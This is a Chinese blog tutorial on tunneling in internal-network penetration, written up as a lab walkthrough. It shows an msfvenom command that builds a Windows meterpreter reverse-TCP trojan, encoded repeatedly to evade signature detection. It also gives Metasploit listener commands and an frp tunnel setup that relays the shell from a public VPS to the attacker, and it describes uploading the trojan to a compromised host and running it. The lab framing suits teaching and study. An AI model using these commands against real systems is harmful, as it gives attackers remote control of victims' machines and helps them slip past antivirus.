内网渗透——隧道代理

最新推荐文章于 2024-06-18 18:10:37 发布
最新推荐文章于 2024-06-18 18:10:37 发布
阅读量562 收藏 7
点赞数 7
分类专栏: 内网渗透 文章标签: 网络安全 系统安全 内网渗透 代理 隧道 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58783105/article/details/133823031
版权

文章目录

代理

实验环境

  • 攻击机kali:192.168.188.133(NAT模式)

  • 模拟的公网服务器(本机):10.9.75.239

  • 失陷主机:10.9.75.145(桥接模式)

代理使用场景

  1. 拿下远程的Web服务器。
  2. Webshell连接不稳定,需要使用稳定的木马程序。
  3. 远程服务器无法直接连接攻击者的电脑。
  4. 需要借助公网的vps转发来在失陷服务器的木马流量。
  5. 借助frp服务端(vps)和客户端(内网攻击者)建立隧道。
  6. 当vps某个端口收到流量的时候,frps会根据提前和frpc约定好的规则,使用建立好的隧道转发流量到frpc。

前提条件

拿下了公网上的一台主机(8.8.8.8)的webshell的权限,需要上传完整功能的木马文件。那么有一个问题,木马执行了后要找谁?此时的失陷主机是连接不到内网的攻击主机,这个时候就需要用到代理技术。

VPS

VPS是Virtual Private Serve的英文缩写,即虚拟专用服务器。VPS就是将一台物理服务器分割成多个独立的虚拟专项服务器,每一个VPS都可以分配独立的公网IP地址,独立的操作系统,能够实现不同VPS的磁盘空间、CPU资源、内存、系统等配置的隔离,通过虚拟技术让每一个用户使用VPS的时候都像是在使用一台独立服务器一样,自定义安装自己需要的东西。

公网VPS:

  • 可以理解为服务器上的虚拟机,攻击者可控。

  • 攻击者和受害者服务器都可以访问到。

建立隧道

image-20231013201014251

因为远程VPS不能访问攻击者的Kali主机。攻击者与远程VPS需要建立隧道,远程VPS使用7000端口建立一个监听(可以说隧道服务或者是代理服务),这样远程VPS就能够访问攻击者主机。还需要将远程VPS的4444端口的流量通过7000端口发送给攻击者的Kali。(代理的核心)

给失陷Web服务器的木马内容:

  • host:当木马执行的时候,去连接公网上的远程VPS。

  • post:连接远程VPS的4444端口。

frp

frp可以实现端口转发,端口监听,隧道功能。frp分为客户端和服务端。

Kali上启动的是客户端(frpc)

本机上启动的是服务端(frps)

frp运行起来的时候会自动的将7000端口开放,当然该端口可以在配置文件中进行修改。这样客户端和服务端就可以连接上了,他们之间就会有一个隧道。

远程VPS服务器的4444端口会主动转发数据流量给客户端的4444端口,不做任何操作,通过frp建立的隧道发送给远程连接的客户端的端口,至于转发给客户端的哪个端口,是由frpc的配置文件来决定的。

MSF木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.239 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

命令解析

  • -p:指定生成的Payload类型为Windows平台的Meterpreter反向TCP Shell。

  • LHOST=10.9.75.239:指定反向连接的目标IP地址,这里是将连接的目标设置为10.9.75.239。(这里就是将木马的数据流量信息发送给远程VPS服务器)

  • LPORT=4444:指定反向连接的目标端口号,这里是将连接的目标端口设置为4444。

  • -e x86/shikata_ga_nai:对生成的Payload使用x86/shikata_ga_nai编码进行混淆,以绕过一些基于特征签名的检测。

  • -f exe:生成的Payload格式为可执行文件(.exe)。

  • -o shell.exe:指定生成的Payload保存的文件名为shell.exe。

  • -i 5:Payload的迭代次数,表示对Payload进行重复编码的次数,以增加混淆程度和绕过某些检测。

image-20231013202806600

监听

使用msf进行监听

msfconsole

载入监控模块

use exploit/multi/handler

加载payload

set payload windows/meterpreter/reverse_tcp
set lport 4444					# 监听本机的4444端口
set lhost 127.0.0.1				# 监听本机的IP地址也就是127.0.0.1
run

image-20231013203620037

查看Kali主机监听的端口号信息

ss -antpl

image-20231013203709384

命令的解析:

  • ss:是一个替代传统的netstat命令的工具,用于显示套接字(socket)统计信息。
  • -a:显示所有的套接字连接,包括监听中的和已建立的连接。
  • -n:以数值形式显示IP地址和端口号,而不进行反向解析。
  • -t:只显示TCP协议相关的连接。
  • -p:显示每个连接所对应的进程ID和进程名称。
  • -l:只显示监听(处于侦听状态)的套接字连接。

开启frp服务端和客户端

注意:先开启frp服务端再开启frp的客户端

开启frp服务端

.\frps.exe -c frps.ini

说明:-c表示指定服务端的配置文件。

image-20231013204220234

开启frp客户端

将frp压缩包先进行一个解压操作。

image-20231013204557619

修改frpc的配置文件。

vim frpc.ini

image-20231013210008466

当通过远程的frp服务器的7000端口连接好后,下面的配置信息[msf]就生效了。

[msf]配置信息使用TCP协议进行通信,当远程VPS的4444端口收到数据的时候会发送数据到kali本地地址的4444端口。

开启frp客户端

./frpc -c frpc.ini

image-20231013211226982

启动成功。

frp服务端情况:

image-20231013211432687

执行exe木马文件

将木马文件上传到失陷主机上,双击执行即可。

image-20231013211717006

kali攻击机成功监听。

image-20231013211817679

来日可期x
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
内网隧道代理技术(一)之内网隧道代理概述
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-09 841
攻击者通过边界主机进入内网,往往会利用它当跳板进行横向渗透,但现在的内部网络大多部署了很多安全设各,网络结构错综复杂,对于某些系统的访问会受到各种阻挠,这就需要借助代理去突破这些限制,因此面对不同的网络环境对于代理的选择及使用显得格外重要。
agent内网渗透代理相关
04-14
内网渗透代理
内网隧道代理技术
qq_73630656的博客
01-04 1337
前言:在学习内网的过程中,我们不得不提到隧道的概念,隧道的搭建在内网渗透有着不可或缺的作用,那么隧道到底是什么呢?它在内网渗透又起到什么样的作用呢?下面由我来带领各位童鞋们一步步揭晓内网隧道代理技术的层层迷雾 本文以逐渐深入的方式详细介绍了nps、frp、ew、lcx、ssh等多种内网隧道代理工具的使用
隧道代理是什么?怎么运作的?
最新发布
ygsqj的博客
06-18 806
隧道代理作为网络代理的一种形式,已经在现代互联网世界中扮演着重要的角色。无论是保护隐私、访问受限网站还是实现网络流量的安全传输,隧道代理都发挥着重要作用。在本文中,我们将深入探讨隧道代理的概念、运作方式以及在不同场景中的应用。
内网渗透-详解代理逻辑及隧道
qq_53058639的博客
08-21 235
红蓝对抗过程中打点以后往往需要进行内网渗透和横向移动,因此大家都需要扎实掌握代理隧道知识,一款优秀的代理工具也可以给内网渗透带来很大的收益。本期分享,小星将通过简单易懂的方式向大家普及各种代理逻辑及隧道的原理和操作过程。**1** ****代理客户端,帮助客户端完成所需请求。举例:小星要向银行贷款,可是因为自己资历不够,所以不获银行放贷,小星个人无法贷到所需款项。此时,只要小星找一个满足资历的A先生去帮忙借贷,银行自然就会放贷。贷款到账后,A先生再私下把钱给到小星。
什么是隧道代理,更适合哪些业务层面呢?
luludexingfu的博客
09-28 224
隧道代理可以通过加密和身份验证技术,提供更高的安全保障。3、隧道代理IP的速度较快:隧道代理IP可以通过优化网络通道和提供高质量的网络带宽来提高网络数据传输的速度,从而减少网络延迟和提高网络数据传输效率。2、隧道代理IP的稳定性较高:隧道代理IP可以通过提供专用的网络通道来保证网络连接的稳定性,从而避免因网络状况不佳而导致网络连接断开的情况。1、隧道代理IP的安全性较高:隧道代理IP可以通过将网络数据包封装在加密的通道中进行传输,从而保护数据的安全性,使得网络数据传输更为安全
什么是隧道代理?要如何设置隧道代理
xiaozhang888888的博客
11-09 1033
HTTP代理随着互联网技术的发展,已经被人熟知。从产品细分来看,HTTP代理分为:动态HTTP代理,静态HTTP代理,和隧道代理,这当中,隧道代理引起使用方式便捷,更受企业和个人开发者喜爱。今天,我们就为新手开发者来科普科普,隧道代理是什么,我们在使用的时候又该如何设置。隧道代理技术,是建立在高性能主机之上的、可以通过云端实现HTTP代理的轻松切换。这项技术将用户的请求传送至各种不同的HTTP代理服务器,允许根据用户需求自定义转发周期。
什么是隧道代理IP?特点是什么?
xiaoxionghttp的博客
12-29 452
隧道代理 IP 是代理 IP 的一种类型,在代理IP的基础上增加了隧道技术,具有更高的安全性和隐私保护能力。但有时,普通的代理IP无法满足特定的需求,这时,隧道代理IP便派上用场。那么,什么是隧道代理IP?(2)数据采集:在进行数据采集时,使用隧道代理IP可以保护数据采集器的真实IP地址,避免被目标网站限制或封禁。(1)网站访问监测:通过使用隧道代理IP,可以隐藏监测网站的访问来源,确保数据的真实性和可靠性。(4)安全保密:隧道代理IP可以加密用户的数据传输,保护用户的隐私和安全,防止数据泄露和攻击
深入了解隧道代理HTTP的协议与技术细节
weixin_73725158的博客
01-02 769
隧道代理HTTP中,客户端首先通过HTTP协议与代理服务器建立连接,然后将请求数据封装在HTTP请求中发送给代理服务器。此时,隧道代理HTTP需要承担协议转换的任务,将客户端的请求转换为目标服务器能理解的格式,并将目标服务器的响应转换回客户端能理解的格式。隧道代理HTTP,作为一种网络通信的桥梁技术,其背后的协议与技术细节承载着网络世界的无尽奥秘。:当有多个代理服务器可用时,隧道代理HTTP可以通过负载均衡技术将请求分发给不同的代理服务器处理,以提高整体的处理能力和容错性。
我所了解的内网渗透——内网渗透知识大总结 作者:未知.pdf
04-08
### 内网渗透基础知识大总结 #### 一、引言 内网渗透测试是指安全专家或黑客通过已获得的外部网络访问权限进一步深入到组织内部网络的过程。这种类型的渗透测试通常涉及利用各种技术和工具来发现并利用内部网络中...
内网渗透之——数据压缩、传输
01-09
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件中 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 ...
域渗透——PassTheHash&PassTheKey
02-26
对于PassTheHash大家应该都很熟悉,在2014年5月发生了一件有趣的事。微软在2014年5月13日发布了针对PassTheHash的更新补丁kb2871997,标题为“UpdatetofixthePass-...域控:域内主机:在上篇LAPS中提到,如果内网主机的
自建隧道代理
热门推荐
njmanong的博客
02-22 1万+
隧道代理可自动变更,免去频繁更换代理的麻烦,仅需一次性配置一个代理IP,其它变IP工作由隧道自动完成。 假设你从免费代理手上拿到一些池子,当然你也可以用爬虫程序自己爬找出后测试筛选可用的,直接在浏览器上面请求,页面效果如下图所示: 现在,你需要做的就是写一个程序,周期性访问这个 url,拉取当前最新可用的 IP 地址,然后把它放到 Redis 中。 这里,我们使用 Redis 的 Hash 这个数据结构,其中 Hash 的字段名就是IP:端口,里面的值就是跟每个 IP 相关的一些信息。 你这个程
天天给-App-抓包,还不懂-HTTP-代理吗?---实用-HTTP
2401_83620841的博客
04-02 707
到这里就了解清楚 HTTP 代理的细节,其实很抽象的概念,也很好理解。简单来说,HTTP 代理可以分为两类,普通代理隧道代理。普通代理作为「中间人」存在,在一次请求中,客户端明文请求代理服务器,在收到请求后,代理服务器又明文去请求终端服务器。在这整个过程中,数据都是明文传输,中间人可以对其中传递的数据进行改写,这就是著名的中间人攻击,可见其有多不安全。这就引申出了支持 HTTPS 的隧道代理
隧道代理,http代理和IP代理
EVA_Proxy的博客
04-12 832
隧道代理、HTTP代理和IP代理各自具备独特的功能和适用场景,为网络通讯提供了多样化的解决方案。编辑zWangkuajing,隧道代理以其强大的加密和匿名性,成为隐私保护和突破网络限制的首选;HTTP代理以其简单易用和广泛支持,成为网页内容缓存和性能优化的得力助手;而IP代理则以其灵活性和可定制性,为网络爬虫和跨境电商等行业提供了便利。
手把手带小姐姐搭建 Socks5 代理隧道
自强不息
11-27 1719
再救你一次,不要让欲望击溃你的意志
内网穿透——frp应用
09-16
frp可以通过反向代理的方式来实现内网穿透,它支持HTTP、HTTPS、TCP和UDP等协议。 具体来说,frp的使用分为服务端和客户端两部分。首先,在服务端和客户端分别安装frp。然后,配置服务端和客户端的frpc.ini文件,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值